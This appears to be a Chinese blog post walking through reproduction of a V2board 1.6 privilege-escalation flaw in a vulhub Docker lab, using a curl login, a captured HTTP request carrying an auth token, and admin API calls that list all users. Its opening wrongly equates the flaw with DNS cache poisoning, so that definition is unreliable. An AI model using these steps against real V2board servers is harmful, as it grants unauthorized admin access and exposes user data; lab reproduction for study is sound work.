V2board缓存投毒漏洞复现

1.什么是缓存投毒

缓存投毒(Cache poisoning),通常也称为域名系统投毒(domain name system poisoning),或DNS缓存投毒(DNS cache poisoning)。它是利用虚假Internet地址替换掉域名系统表中的地址,进而制造破坏。当网络用户在带有该虚假地址的页面中进行搜寻,以访问某链接时,网页浏览器由于受到该虚假条目的影响而打开了不同的网页链接。在这种情况下,蠕虫、木马、浏览器劫持等恶意软件就可能会被下载到本地用户的电脑上。

------百度

关于v2board的相关漏洞信息和文件在此链接https://github.com/vulhub/vulhub/tree/master/v2board/1.6-privilege-escalation

2.复现漏洞

1.首先 建立一个目录,复制以下两个脚本文件

2. 建立完成后,利用docker创建复现环境

docker compose up -d

下载完成后输入IP地址加端口号即可看见登录界面

3.自行注册一个账号

然后,将电子邮件和密码替换为您自己的数据并登录:

curl -i -s -k -XPOST --data-binary "email=123@123.com&password=12345678"http://localhost:9090/api/v1/passport/auth/login

得到如下auth_data码

4.打开bp抓包,将带有auth_data码的request包放入其中

GET /api/v1/user/info HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36

Connection: close

Authorization: ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkMVJpUFplR2RnZlFPSVRyWEM4dW0udW5QZVZNTGs3RlFFbkFVVnBwbEhmTlMyczdQaEpTa3E=

Cache-Control: max-age=0

即可得出该用户的信息

此步骤是让服务器将您的授权保存到 Redis 缓存。

最后,可以简单地使用此授权调用所有管理员 API,例如 http://your-ip:8080/api/v1/admin/user/fetch

我们利用管理员的api将所有用户信息一一列出,漏洞复现大功告成!!!

相关推荐
躲猫猫的喵喵1 小时前
Ubuntu2204降内核版本
linux·运维·服务器·ubuntu
zdslovezy2 小时前
CentOS 系统升级 OpenSSH 和 OpenSSL 的完整方案
linux·运维·centos
cccccc语言我来了3 小时前
(Linux (6):从包管理到工具探索,构建系统操作基础认知)
linux·运维·服务器
8K超高清3 小时前
高校巡展:中国传媒大学+河北传媒学院
大数据·运维·网络·人工智能·传媒
wuk9984 小时前
CentOS7环境搭建L2TP服务器
运维·服务器
恒创科技HK4 小时前
香港1核2G云服务器当网站服务器够用不?
运维·服务器
IT 小阿姨(数据库)4 小时前
PostgreSQL 之上的开源时序数据库 TimescaleDB 详解
运维·数据库·sql·postgresql·开源·centos·时序数据库
颜大哦4 小时前
linux安装mysql
linux·运维·mysql·adb
JanelSirry5 小时前
缓存击穿,缓存穿透,缓存雪崩的原因和解决方案(或者说使用缓存的过程中有没有遇到什么问题,怎么解决的)
缓存
学习3人组5 小时前
Node.js 网站服务器开发
运维·服务器·node.js